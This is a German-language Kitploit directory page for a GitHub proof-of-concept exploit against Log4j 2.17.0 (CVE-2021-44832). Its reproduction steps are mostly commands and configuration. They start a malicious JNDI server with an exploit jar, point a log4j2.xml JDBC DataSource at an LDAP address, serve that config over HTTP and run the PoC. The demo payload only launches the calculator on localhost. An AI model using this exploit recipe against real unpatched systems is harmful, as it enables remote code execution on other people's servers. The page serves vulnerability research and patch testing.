Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j_RCE_CVE-2021-44832 — Proof-of-Concept-Exploit für Log4j 2.17.0 RCE (CVE-2021-44832) unter Verwendung von JNDI-Injection mit Bereitstellung einer schädlichen Konfigurationsdatei. | Kitploit
Tools/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-Tool
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Proof-of-Concept-Exploit für Log4j 2.17.0 RCE (CVE-2021-44832) unter Verwendung von JNDI-Injection mit Bereitstellung einer schädlichen Konfigurationsdatei.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
41vor 4 JahrenNoch nicht geprüft

Log4j 2.17.0 RCE -- CVE-2021-44832

Reproduktion

  1. Starte einen bösartigen JNDI-Server
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. Ändere den DataSource-Teil in config/log4j2.xml zu deiner generierten JNDI-Adresse
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

Stelle die Konfigurationsdatei auf deinem eigenen HTTP-Server bereit.

  1. Ändere den Poc

Ändere ihn zu der auf dem HTTP-Server bereitgestellten Konfigurationsdatei.

  1. Ausführen

Log4shell Topic

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Beiträge zu reapoc willkommen

https://github.com/cckuailong/reapoc

Tool herunterladen